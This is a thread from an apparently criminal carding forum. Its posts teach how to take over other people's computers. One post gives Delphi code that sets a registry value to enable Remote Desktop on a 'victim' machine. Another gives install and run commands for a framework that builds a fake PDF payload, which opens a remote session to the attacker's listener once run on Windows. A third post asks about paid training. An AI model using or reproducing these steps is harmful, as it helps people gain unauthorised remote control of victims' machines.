admin

Administrator
Staff member
Reaction score
Jabber
[email protected]
Telegram
cardervip
Hello everyone, i got in shape of writing those small articles-tutorials. I can remember myself searching for source code, examples and stuff like that. It wasnt easy, so im trying to help you now...

Some time before I searched information how on delphi open port 3389, and control remote desktop of the victim. I couldn't find any information about it, so I decided to write an article about it. We will work with registry, because it contains the information about remote connection.

Lets Begin.

Everything is not as hard as you think. We just need to change something in registry.
It is located here
Code:
[B][COLOR="white"]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server[/COLOR][/B] and parameter[COLOR="White"][B]fDenyTSConnections[/B][/COLOR]
we need to change its value to 0, to open the access. Accordingly if you set it as 1, it will be closed.

Heres a part of code
Code:
Registry:=tRegistry.Create;  //Making an edit of registry
   Registry.RootKey:=HKEY_LOCAL_MACHINE; //finding key
   Registry.OpenKey('\SYSTEM\CurrentControlSet\Control\Terminal Server',true); //Finding tree
   Registry.WriteString('fDenyTSConnections','0'); //Changing value
   Registry.CloseKey; //Closing
   Registry.Free;

Dont forget to write the unit registry

Develop the code, product the idea!!!If I wont go to army, I will tell you next time how to make admin users on windows, on delphi!

(c) Dager315
Russian version: http://carder.market/showthread.php?t=47213

Meylis

Professional
Reaction score
Thank you, would it, tried it and it works. The only thing I wanted to clarify is how much do your training services cost? if that let me know on the forum or in PM. Good luck and I will wait for an answer. I recommend the dude to everyone.

Father

Professional
Reaction score
We get remote access to the computer via an image

Installation:

Code:
$ git clone https://github.com/4w4k3/Insanity-Framework
$ cd Insanity-Framework
$ chmod +x insanity.py
$ ./install.sh

Using:
Code:
$ sudo python2 insanity.py

At the first launch, all the necessary dependencies will be installed and the main menu will open. In it, select the first item to create the payload. Next, select Fake Acrobat PDF. Enter the IP address and port.

As a result, a .pdf file will be created, and the program will prompt us to launch listener, which we agree to. Now, if you run the generated file on Windows, a session will open in the terminal where listener is running, which will allow you to remotely manage the infected host.